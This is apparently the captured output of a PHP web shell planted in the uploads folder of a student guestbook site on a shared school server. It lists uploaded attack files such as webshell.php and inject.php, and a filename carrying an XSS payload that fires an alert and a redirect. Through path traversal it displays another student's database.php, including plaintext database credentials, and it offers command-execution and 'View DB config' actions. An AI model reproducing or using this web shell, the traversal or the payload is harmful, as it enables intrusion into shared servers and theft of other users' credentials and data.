🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../588742.klas4s23.mid-ica.nl/public_html/Login_Systeem/classes/database.php

<?php

// In deze class in de connect() methode reeds gemaakt. Maak de login() methode af en
// gebruik deze om overige SQL queries uit te voeren.

class database
{
    private static $conn;
    public static $error;

    public static function connect()
    {
        $servernaam = "localhost";
        $dbname = "login_pvb_2024";
        $username = "login_pvb";
        $password = "login_pvb123";

        try {
            $conn = new \PDO("mysql:host=$servernaam;dbname=$dbname", $username, $password);
            $conn->setAttribute(\PDO::ATTR_ERRMODE, \PDO::ERRMODE_EXCEPTION);
            self::$conn = $conn;
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();
            exit();
        }
    }

    /**
     * @param $username
     * @param $password
     * @return bool
     */

    public static function addUser($username, $password): bool
    {
        if (!isset(self::$conn)) {
            self::connect();
        }
        $result = false;
        try {
            $sql = 'INSERT INTO user (userid, username, password) VALUES (NULL, :param1, :param2);';

            $stmt = self::$conn->prepare($sql);
            $stmt->bindParam(':param1', $username);
            $hashedPass = password_hash($password, PASSWORD_DEFAULT);
            $stmt->bindParam(':param2', $hashedPass);
            $stmt->execute();
            $result = true;
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();
        } finally {
            return $result;
        }
    }

    public static function loginUser($username, $password): bool
    {
        if (!isset(self::$conn)) {
            self::connect();
        }

        try {
            $sql = "SELECT userid, username, password FROM user WHERE username = :username";
            $stmt = self::$conn->prepare($sql);
            $stmt->bindParam(':username', $username);
            $stmt->execute();

            $result = $stmt->fetch();
            $rowCount = $stmt->rowCount();

            if ($rowCount <= 0) {
                self::$error = 'No user found';
                return false;
            }

            $databasePassword = $result['password'];

            if (password_verify($password, $databasePassword)) {
                session_start();
                $_SESSION['loggedIn'] = true;
                $_SESSION['userId'] = $result['userid'];
                $_SESSION['username'] = $result['username'];
                return true;
            } else {
                self::$error = 'Invalid password';
                return false;
            }
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();
            return false;
        }
    }

    public static function showAllUsers(): string
    {
        if (!isset(self::$conn)) {
            self::connect();
        }

        try {
            $sql = "SELECT * FROM user";
            $stmt = self::$conn->prepare($sql);
            $stmt->execute();

            $users = $stmt->fetchAll(\PDO::FETCH_ASSOC);

            if (count($users) <= 0) {
                self::$error = 'No users found';
                return '<p>No users found.</p>';
            }

            $html = '<div>';
            $html .= '<table>';
            $html .= '<tr>';
            $html .= '<th></th>';
            $html .= '<th>Gebruikersnaam</th>';
            $html .= '<th>Postcode</th>';
            $html .= '<th>Huisnummer</th>';
            $html .= '<th>Woonplaats</th>';
            $html .= '</tr>';

            foreach ($users as $user) {
                $html .= '<tr>';
                $html .= '<td><a href="edit.php?userId=' . htmlspecialchars($user['userid']) . '"><i class="fas fa-edit"></i></a></td>';
                $html .= '<td>' . htmlspecialchars($user['username']) . '</td>';
                $html .= '<td>' . htmlspecialchars($user['postcode']) . '</td>';
                $html .= '<td>' . htmlspecialchars($user['huisnummer']) . '</td>';
                $html .= '<td>' . htmlspecialchars($user['woonplaats']) . '</td>';
                $html .= '</tr>';
            }

            $html .= '</table>';
            $html .= '</div>';

            return $html;
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();
            return '<p>Error: ' . htmlspecialchars(self::$error) . '</p>';
        }
    }

    public static function update($newPostcode, $newHuisnummer, $newWoonplaats, $userId): bool
    {
        if (!isset(self::$conn)) {
            self::connect();
        }

        try {
            $sql = "UPDATE user SET postcode = :postcode, huisnummer = :huisnummer, woonplaats = :woonplaats WHERE userid = :userid";
            $stmt = self::$conn->prepare($sql);

            $stmt->bindParam(":postcode", $newPostcode);
            $stmt->bindParam(":huisnummer", $newHuisnummer);
            $stmt->bindParam(":woonplaats", $newWoonplaats);
            $stmt->bindParam(":userid", $userId);

            $stmt->execute();

            if ($stmt->rowCount() > 0) {
                return true;
            } else {
                return false;
            }
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();
            return false;
        }
    }

    public static function updateUser()
    {
        if ($_SERVER['REQUEST_METHOD'] === "POST") {
            if (isset($_POST['userId'])) {
                $userId = htmlspecialchars($_POST['userId']);

                if (isset($_POST['Wijzig'])) {
                    $newPostcode = htmlspecialchars($_POST['postcode']);
                    $newHuisnummer = htmlspecialchars($_POST['huisnummer']);
                    $newWoonplaats = htmlspecialchars($_POST['woonplaats']);
                }

                database::connect();
                $success = database::update($newPostcode, $newHuisnummer, $newWoonplaats, $userId);

                if ($success) {
                    header("Location: index.php");
                    exit();
                } else {
                    echo 'Failed to update user.';
                }
            } else {
                echo 'Parameter missing';
            }
        }
    }

    public static function logout() {
        $_SESSION = array();
        session_destroy();

        header("Location: login.php");
        exit();
    }
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!